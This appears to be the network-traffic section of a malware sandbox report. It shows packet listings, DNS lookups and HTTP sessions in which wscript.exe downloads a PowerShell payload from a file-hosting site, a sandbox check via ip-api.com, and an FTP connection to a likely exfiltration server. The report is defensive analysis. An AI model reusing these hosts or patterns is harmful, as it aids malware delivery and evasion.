                                                                  Dec 20, 2024 17:42:30.320228100 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.320350885 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.320368052 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.320444107 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.326622963 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.326641083 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.326778889 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.326796055 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.326936007 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.332211971 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.332231998 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.332298994 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.332308054 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.332348108 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.338104963 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.338141918 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.338247061 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.338263035 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.338342905 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.384227037 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.384260893 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.384376049 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.384407043 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.384507895 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.484772921 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.484807014 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.484865904 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.484910011 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.484946012 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.484992027 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.486628056 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.486645937 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.486717939 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.486740112 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.486793995 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.489778042 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.489797115 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.489852905 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.489861012 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.489928007 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.492255926 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.492274046 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.492342949 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.492353916 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.492420912 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.494668007 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.494692087 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.494779110 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.494787931 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.494832993 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.497792959 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.497817039 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.497884035 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.497893095 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.497946978 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.500509977 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.500526905 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.500600100 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.500607967 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.500653028 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.574500084 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.574551105 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.574671030 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.574759960 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.574799061 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.574961901 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.677016973 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.677047014 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.677185059 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.677207947 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.677259922 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.679229021 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.679245949 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.679307938 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.679322004 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.679368019 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.681859970 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.681895971 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.681946993 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.681955099 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.681982994 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.681999922 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.684242964 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.684262037 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.684322119 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.684329987 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.684366941 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.686907053 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.686930895 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.686991930 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.687000990 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.687057018 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.689874887 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.689893007 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.689944983 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.689954042 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.690000057 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.692506075 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.692532063 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.692661047 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.692668915 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.692749977 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.766736984 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.766757965 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.766834974 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.766864061 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.766922951 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.872829914 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.872859001 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.872991085 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.873003006 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.873075962 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.875060081 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.875082970 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.875154972 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.875163078 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.875201941 CET49707443192.168.2.8108.181.20.35
Dec 20, 2024 17:42:30.877253056 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:30.877274036 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:30.877346039 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:30.877353907 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:30.877393961 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:30.880321026 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:30.880351067 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:30.880403042 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:30.880429029 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:30.880455971 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:30.880476952 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:30.882652044 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:30.882668972 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:30.882742882 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:30.882757902 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:30.882797003 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:30.885783911 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:30.885801077 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:30.886183023 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:30.886209011 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:30.886271000 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:30.888385057 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:30.888402939 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:30.888761044 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:30.888768911 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:30.888861895 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:30.958894968 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:30.958921909 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:30.959033966 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:30.959047079 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:30.959094048 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.065798998 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.065830946 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.066008091 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.066019058 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.066061020 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.067631960 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.067653894 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.067760944 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.067770004 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.067815065 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.070619106 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.070660114 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.070755959 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.070764065 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.070808887 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.073076963 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.073132038 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.073198080 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.073204994 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.073262930 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.073271990 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.075870991 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.075913906 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.075994015 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.076000929 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.076021910 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.076046944 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.078705072 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.078752041 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.078794003 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.078800917 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.078825951 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.078845978 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.081335068 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.081378937 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.081415892 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.081425905 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.081497908 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.150762081 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.150788069 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.150880098 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.150890112 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.150929928 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.257975101 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.257997036 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.258169889 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.258186102 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.258238077 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.260648012 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.260663986 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.260746002 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.260755062 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.260795116 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.263050079 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.263072014 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.263134956 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.263144016 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.263184071 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.265300035 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.265316010 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.265387058 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.265394926 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.265435934 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.268374920 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.268398046 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.268471003 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.268480062 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.268518925 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.271013975 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.271058083 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.271094084 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.271100998 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.271131039 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.271142960 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.273556948 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.273614883 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.273660898 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.273667097 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.273721933 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.343142033 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.343209982 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.343259096 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.343271017 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.343305111 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.343317986 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.450706959 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.450761080 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.451004982 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.451018095 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.451134920 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.452537060 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.452603102 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.452641010 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.452649117 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.452666998 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.452687979 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.455666065 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.455709934 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.455784082 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.455792904 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.455893993 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.458113909 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.458161116 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.458188057 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.458195925 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.458209991 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.458233118 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.461118937 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.461136103 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.461185932 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.461196899 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.461234093 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.462871075 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.462918043 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.462943077 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.462951899 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.462968111 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:31.462990046 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.463007927 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.463156939 CET  49707  443  192.168.2.8  108.181.20.35
Dec 20, 2024 17:42:31.463172913 CET  443  49707  108.181.20.35  192.168.2.8
Dec 20, 2024 17:42:36.688641071 CET  49708  80  192.168.2.8  208.95.112.1
Dec 20, 2024 17:42:36.808145046 CET  80  49708  208.95.112.1  192.168.2.8
Dec 20, 2024 17:42:36.808228016 CET  49708  80  192.168.2.8  208.95.112.1
Dec 20, 2024 17:42:36.809194088 CET  49708  80  192.168.2.8  208.95.112.1
Dec 20, 2024 17:42:36.929117918 CET  80  49708  208.95.112.1  192.168.2.8
Dec 20, 2024 17:42:37.963941097 CET  80  49708  208.95.112.1  192.168.2.8
Dec 20, 2024 17:42:38.008157969 CET  49708  80  192.168.2.8  208.95.112.1
Dec 20, 2024 17:42:40.082735062 CET  49710  21  192.168.2.8  195.252.110.253
Dec 20, 2024 17:42:40.202387094 CET  21  49710  195.252.110.253  192.168.2.8
Dec 20, 2024 17:42:40.202486038 CET  49710  21  192.168.2.8  195.252.110.253
Dec 20, 2024 17:42:40.207353115 CET  49710  21  192.168.2.8  195.252.110.253
Dec 20, 2024 17:42:40.326992035 CET  21  49710  195.252.110.253  192.168.2.8
Dec 20, 2024 17:42:40.327219009 CET  49710  21  192.168.2.8  195.252.110.253
Dec 20, 2024 17:43:29.477066994 CET  49708  80  192.168.2.8  208.95.112.1
Dec 20, 2024 17:43:29.597132921 CET  80  49708  208.95.112.1  192.168.2.8
Dec 20, 2024 17:43:29.597199917 CET  49708  80  192.168.2.8  208.95.112.1
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Dec 20, 2024 17:42:26.380230904 CET  54853  53  192.168.2.8  1.1.1.1
Dec 20, 2024 17:42:26.827097893 CET  53  54853  1.1.1.1  192.168.2.8
Dec 20, 2024 17:42:36.543636084 CET  61462  53  192.168.2.8  1.1.1.1
Dec 20, 2024 17:42:36.681466103 CET  53  61462  1.1.1.1  192.168.2.8
Dec 20, 2024 17:42:39.463226080 CET  64386  53  192.168.2.8  1.1.1.1
Dec 20, 2024 17:42:40.081818104 CET  53  64386  1.1.1.1  192.168.2.8
Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
Dec 20, 2024 17:42:26.380230904 CET  192.168.2.8  1.1.1.1  0x41e6  Standard query (0)  files.catbox.moe  A (IP address)  IN (0x0001)  false
Dec 20, 2024 17:42:36.543636084 CET  192.168.2.8  1.1.1.1  0xeebf  Standard query (0)  ip-api.com  A (IP address)  IN (0x0001)  false
Dec 20, 2024 17:42:39.463226080 CET  192.168.2.8  1.1.1.1  0x3986  Standard query (0)  ftp.jeepcommerce.rs  A (IP address)  IN (0x0001)  false
Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class  DNS over HTTPS
Dec 20, 2024 17:42:26.827097893 CET  1.1.1.1  192.168.2.8  0x41e6  No error (0)  files.catbox.moe  (none)  108.181.20.35  A (IP address)  IN (0x0001)  false
Dec 20, 2024 17:42:36.681466103 CET  1.1.1.1  192.168.2.8  0xeebf  No error (0)  ip-api.com  (none)  208.95.112.1  A (IP address)  IN (0x0001)  false
Dec 20, 2024 17:42:40.081818104 CET  1.1.1.1  192.168.2.8  0x3986  No error (0)  ftp.jeepcommerce.rs  (none)  195.252.110.253  A (IP address)  IN (0x0001)  false
                                                                  • files.catbox.moe
                                                                  • ip-api.com
Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.8  49708  208.95.112.1  80  5212  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp  Bytes transferred  Direction  Data
Dec 20, 2024 17:42:36.809194088 CET  80  OUT  GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Dec 20, 2024 17:42:37.963941097 CET  175  IN  HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 16:42:37 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.8  49707  108.181.20.35  443  5056  C:\Windows\System32\wscript.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-20 16:42:28 UTC  330  OUT  GET /gj7umd.ps1 HTTP/1.1
Accept: */*
Accept-Language: en-ch
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: files.catbox.moe
Connection: Keep-Alive
2024-12-20 16:42:29 UTC  553  IN  HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 16:42:28 GMT
Content-Type: application/octet-stream
Content-Length: 1291000
Last-Modified: Thu, 19 Dec 2024 10:50:32 GMT
Connection: close
ETag: "6763fa78-13b2f8"
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, HEAD
Accept-Ranges: bytes
